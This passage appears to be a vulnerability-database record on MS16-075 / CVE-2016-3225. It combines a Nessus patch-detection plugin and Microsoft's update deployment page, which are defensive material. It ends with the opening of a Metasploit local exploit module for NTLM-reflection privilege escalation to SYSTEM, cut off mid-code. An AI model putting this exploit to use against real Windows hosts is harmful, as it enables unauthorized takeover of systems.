files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by an elevation of privilege\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by an elevation of privilege vulnerability in the\nMicrosoft Server Message Block (SMB) server when handling forwarded\ncredential requests that are intended for another service running\non the same host. An authenticated attacker can exploit this, via a\nspecially crafted application, to execute arbitrary code with elevated\npermissions.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-075\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3225\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-075';\nkbs = make_list(\n \"3161561\",\n \"3163017\",\n \"3163018\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"3161561\";\nif (\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srvnet.sys\", version:\"6.0.6002.19659\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srvnet.sys\", version:\"6.0.6002.23974\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / Windows Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"srvnet.sys\", version:\"6.1.7601.23452\", min_version:\"6.1.7600.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Windows Server 2012\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srvnet.sys\", version:\"6.2.9200.21860\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srvnet.sys\", version:\"6.3.9600.18340\", min_version:\"6.3.9600.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n vuln++;\n\nkb = \"3163017\";\nif (\n # Windows 10\n hotfix_is_vulnerable(os:\"10\", sp:0, file:\"srvnet.sys\", version:\"10.0.10240.16942\", min_version:\"10.0.10240.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n vuln++;\n\nkb = \"3163018\";\nif (\n # Windows 10 1511\n hotfix_is_vulnerable(os:\"10\", sp:0, file:\"srvnet.sys\", version:\"10.0.10586.420\", min_version:\"10.0.10586.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n vuln++;\n\n\nif (vuln)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:44:44", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3225"], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to the system and runs a specially crafted application.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to the system and runs a specially crafted application.<br/><br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-075\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-075</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-6\" target=\"_self\">3161561</a> MS16-075 and MS16-076: Description of the security update for Windows SMB Server: June 14, 2016 </li><li><a href=\"https://support.microsoft.com/help/3163017\" id=\"kb-link-7\" target=\"_self\">3163017</a> Cumulative update for Windows 10: June 14, 2016</li><li><a href=\"https://support.microsoft.com/help/3163018 \" id=\"kb-link-8\" target=\"_self\">3163018</a>Cumulative update for Windows 10 Version 1511 and Windows Server 2016 Technical Preview 4: June 14, 2016</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-10\" target=\"_self\">Get security updates automatically</a>.<br/><br/><span class=\"text-base\">Note</span> For Windows RT 8.1, this update is available through Windows Update only.<br/></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 2: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms16-075\" id=\"kb-link-11\" target=\"_self\">Microsoft Security Bulletin MS16-075</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\"> Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-13\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3161561-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-15\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows 7 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the /Uninstall setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-17\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 R2 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3161561-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-19\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows 8.1<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3161561-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2012 and Windows Server 2012 R2 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3161561-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\"> Windows RT 8.1 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">These updates are available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-24\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under See also, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3161561\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3161561</a></td></tr></table></div><h4 class=\"sbody-h4\"> Windows 10 (all editions)<br/></h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3163017-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3163017-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3163018-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3163018-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and then under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3163017\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 3163017</a><br/>See <a href=\"https://support.microsoft.com/help/3163018\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3163018</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-29\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-30\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-31\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-32\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-06-14T19:04:10", "id": "KB3164038", "href": "https://support.microsoft.com/en-us/help/3164038/", "published": "2016-06-14T00:00:00", "title": "MS16-075: Security Update for Windows SMB Server: June 14, 2016", "type": "mskb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-10-06T20:46:48", "description": "This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.", "edition": 1, "published": "2018-10-06T00:00:00", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3225"], "modified": "2018-10-06T00:00:00", "id": "1337DAY-ID-31263", "href": "https://0day.today/exploit/description/31263", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\r\n 'Description' => %q(\r\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\r\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\r\n does not spawn as SYSTEM, however once achieving a shell, one can easily\r\n use incognito to impersonate the token.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'FoxGloveSec', # the original Potato exploit\r\n 'breenmachine', # Rotten Potato NG!\r\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\r\n ],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => ['meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'none',\r\n 'WfsDelay' => '20'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows x86', { 'Arch' => ARCH_X86 }],\r\n ['Windows x64', { 'Arch' => ARCH_X64 }]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'References' =>\r\n [\r\n ['MSB', 'MS16-075'],\r\n ['CVE', '2016-3225'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\r\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\r\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\r\n ],\r\n 'DisclosureDate' => 'Jan 16 2016',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def assign_target\r\n if target.name == 'Automatic'\r\n case sysinfo[\"Architecture\"]\r\n when 